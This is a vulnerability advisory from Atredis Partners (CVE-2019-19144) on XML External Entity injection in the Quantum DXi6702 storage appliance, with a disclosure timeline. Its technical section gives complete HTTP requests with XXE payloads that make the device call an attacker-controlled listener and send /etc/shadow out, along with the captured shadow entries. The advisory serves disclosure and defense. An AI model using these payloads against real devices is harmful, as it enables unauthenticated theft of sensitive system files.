Skip to content

Latest commit

 

History

History
131 lines (96 loc) · 3.55 KB

ATREDIS-2019-0004.md

File metadata and controls

131 lines (96 loc) · 3.55 KB

Quantum DXi6702 - XML External Entity Injection

Vendors

Quantum Corporation

Affected Products

Quantum DXi6702 2.3.0.3 (11449-53631 Build304)

Summary

The Quantum DXi6702 Network Attached Storage device processes user-supplied XML data in unsafe ways, resulting in XML External Entity Injection. This issue can allow for an unauthenticated attacker to read arbitrary files from the device with root privileges.

Mitigation

  • No mitigations are known at this time.

Credit

These issues were found by Justin Kennedy of Atredis Partners

References

  • CVE-2019-19144

Report Timeline

2019-08-22: Atredis Partners provided a copy of this advisory to Quantum Corporation by email.

2019-10-08: Atredis Partners provided a copy of this advisory to CERT/CC.

2019-11-21: Atredis Partners published this advisory.

Technical Details

The Quantum DXi6702 authentication process requires the client to send their credentials as an XML document:

POST /rest/Users?action=authenticate HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 119
DNT: 1
Connection: close

<Credentials><UserName>admin</UserName><Password>password</Password><ClientInfo>GUI</ClientInfo><id></id></Credentials>

By setting up a netcat listener and specifying an XML External Entity, the device will connect to the netcat listener, confirming that XML External Entities are enabled:

POST /rest/Users?action=authenticate HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 252
DNT: 1
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://192.168.1.3:8881/?xxe" >]>
<Credentials><UserName>&xxe;</UserName><Password>admin</Password><ClientInfo>GUI</ClientInfo><id></id></Credentials>

# nc -l -v -p 8881
Listening on [0.0.0.0] (family 0, port 8881)
Connection from [192.168.1.2] port 8881 [tcp/*] accepted (family 2, sport 50547)
GET /?xxe HTTP/1.1
User-Agent: Java/1.6.0_26
Host: 192.168.1.3:8881
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

Using the xxeserve server tool by joernchen, the /etc/shadow file can be extracted, confirming that the process running the XML parser is running with root privileges:

POST /rest/Users?action=authenticate HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 159
DNT: 1
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://192.168.1.3:8888/xml?f=/etc/shadow">
%remote;
%int;
%trick;]>

$ ruby xxeserve.rb 8888
192.168.1.2 - - [24/Jun/2019:10:18:00 -0500] "GET /?p=root:$1$<redacted>:15622:0:99999:7:::
bin:*:15622:0:99999:7:::
daemon:*:15622:0:99999:7:::
adm:*:15622:0:99999:7:::
lp:*:15622:0:99999:7:::
sync:*:15622:0:99999:7:::
shutdown:*:15622:0:99999:7:::
halt:*:15622:0:99999:7:::
mail:*:15622:0:99999:7:::
news:*:15622:0:99999:7:::
uucp:*:15622:0:99999:7:::